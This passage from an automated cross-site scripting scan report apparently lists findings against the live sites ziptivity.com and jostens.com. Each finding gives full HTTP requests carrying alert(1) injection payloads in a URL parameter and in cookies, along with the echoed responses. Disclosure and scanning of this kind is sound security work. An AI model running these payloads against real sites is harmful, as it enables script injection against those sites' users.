GET /SearchPage.aspx?Ziptivity=Ziptivity&Zip=017427711a'style%3d'x%3aexpression(alert(1))'f4297689048&Distance=20 HTTP/1.1
Host: ziptivity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ziptivity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s0vxv3zrztgid4nchrwsfa55; __utma=249806477.1558718341.1319479011.1319479011.1319479011.1; __utmb=249806477.1.10.1319479011; __utmc=249806477; __utmz=249806477.1319479011.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Oct 2011 18:08:15 GMT
Content-Length: 294255


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Ziptivity -
...[SNIP]...
<a class="topMenu fontGothic" href='/LogIn.aspx?ReturnUrl=http://ziptivity.com/SearchPage.aspx?Ziptivity=Ziptivity&Zip=017427711a'style='x:expression(alert(1))'f4297689048&Distance=20'>
...[SNIP]...

1.22. http://ziptivity.com/SearchPage.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ziptivity.com
Path:   /SearchPage.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fdc5e'style%3d'x%3aexpression(alert(1))'2295f6e9b4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fdc5e'style='x:expression(alert(1))'2295f6e9b4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /SearchPage.aspx?Ziptivity=Ziptivity&Zip=01742&Distance=20&fdc5e'style%3d'x%3aexpression(alert(1))'2295f6e9b4e=1 HTTP/1.1
Host: ziptivity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ziptivity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s0vxv3zrztgid4nchrwsfa55; __utma=249806477.1558718341.1319479011.1319479011.1319479011.1; __utmb=249806477.1.10.1319479011; __utmc=249806477; __utmz=249806477.1319479011.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Oct 2011 18:11:44 GMT
Content-Length: 294333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Ziptivity -
...[SNIP]...
<a class="topMenu fontGothic" href='/LogIn.aspx?ReturnUrl=http://ziptivity.com/SearchPage.aspx?Ziptivity=Ziptivity&Zip=01742&Distance=20&fdc5e'style='x:expression(alert(1))'2295f6e9b4e=1'>
...[SNIP]...

1.23. http://www.jostens.com/apps/shop/yrbk_catalog.asp [LeftNav cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jostens.com
Path:   /apps/shop/yrbk_catalog.asp

Issue detail

The value of the LeftNav cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bce56"><script>alert(1)</script>6fecb848eb8 was submitted in the LeftNav cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /apps/shop/yrbk_catalog.asp?cid=156508&pfid=2011100705205134064&affiliateId=1120371 HTTP/1.1
Host: www.jostens.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.stowe.k12.vt.us/SHS/SHS_promo02.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_shop_app_http=1192101898.34251.0000; DInfo=odate2=&mdate=&odate1=&hasDates=; profileGuid=2671bcb4-28e0-43fa-b6a2-2e30fe140974; affiliateIds=%7C1120371%7CA08773500%7C156508; affiliateName=Stowe Middle%2FHigh School; LeftNav=GID=&PFID=2011100705205134064&PPID=&JunsNo=08773500&CatalogName=2012+Yearbook&PID=&Org%5FType=K%5F12&CustomerName=Stowe+Middle%2FHigh+School&CID=156508&OracleNo=1120371bce56"><script>alert(1)</script>6fecb848eb8

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 33601
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: JSESSIONID=EBDDC2934FE7761EF47E21D35B5F35F6; Path=/apps/profile
Set-Cookie: profileGuid=2671bcb4-28e0-43fa-b6a2-2e30fe140974; Path=/
Set-Cookie: LeftNav=OracleNo=1120371bce56%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6fecb848eb8&CID=156508&PID=&CustomerName=Stowe+Middle%2FHigh+School&Org%5FType=K%5F12&PPID=&CatalogName=2012+Yearbook&JunsNo=08773500&GID=&PFID=2011100705205134064; domain=.jostens.com; path=/
From: owbswcpwa02
Date: Mon, 24 Oct 2011 23:25:15 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-885
...[SNIP]...
<link href="/apps/content/css/bundle/customer-1120371bce56"><script>alert(1)</script>6fecb848eb8.css" rel="stylesheet" type="text/css" media="all"/>
...[SNIP]...

1.24. http://www.jostens.com/apps/shop/yrbk_catalog.asp [profileGuid cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jostens.com
Path:   /apps/shop/yrbk_catalog.asp

Issue detail

The value of the profileGuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc5c3"-alert(1)-"1c32a5684b8 was submitted in the profileGuid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/shop/yrbk_catalog.asp?cid=156508&pfid=2011100705205134064&affiliateId=1120371 HTTP/1.1
Host: www.jostens.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.jostens.com/apps/shop/yrbk_catalog.asp?cid=156508&pfid=2011100705205134064&affiliateId=1120371
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_shop_app_http=1192101898.34251.0000; DInfo=odate2=&mdate=&odate1=&hasDates=; affiliateIds=%7C1120371%7CA08773500%7C156508; affiliateName=Stowe Middle%2FHigh School; profileGuid=dc5c3"-alert(1)-"1c32a5684b8; BIGipServerpool_commerce_services_http=386795530.37151.0000; LeftNav=OracleNo=1120371&CID=156508&PID=&CustomerName=Stowe+Middle%2FHigh+School&Org%5FType=K%5F12&PPID=&CatalogName=2012+Yearbook&JunsNo=08773500&GID=&PFID=2011100705205134064

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 33507
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: profileGuid=2671bcb4-28e0-43fa-b6a2-2e30fe140974; Path=/
Set-Cookie: LeftNav=OracleNo=1120371&CID=156508&PID=&CustomerName=Stowe+Middle%2FHigh+School&Org%5FType=K%5F12&PPID=&CatalogName=2012+Yearbook&JunsNo=08773500&GID=&PFID=2011100705205134064; domain=.jostens.com; path=/
From: owbswcpwa02
Date: Mon, 24 Oct 2011 23:25:10 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-885
...[SNIP]...
in WebTrends        
       var gDcsId="";

       var DCSext=new Object();

       DCSext.PFID="2011100705205134064";
       DCSext.CID="156508";
       DCSext.PID="";
       DCSext.PPID="";
       DCSext.GID="";
       DCSext.Shopper="dc5c3"-alert(1)-"1c32a5684b8";
       
       var WT=new Object();
       WT.sv="10.8.14.71";
   
   //-->
...[SNIP]...

Report generated by XSS.CX at Fri Oct 28 15:05:17 CDT 2011.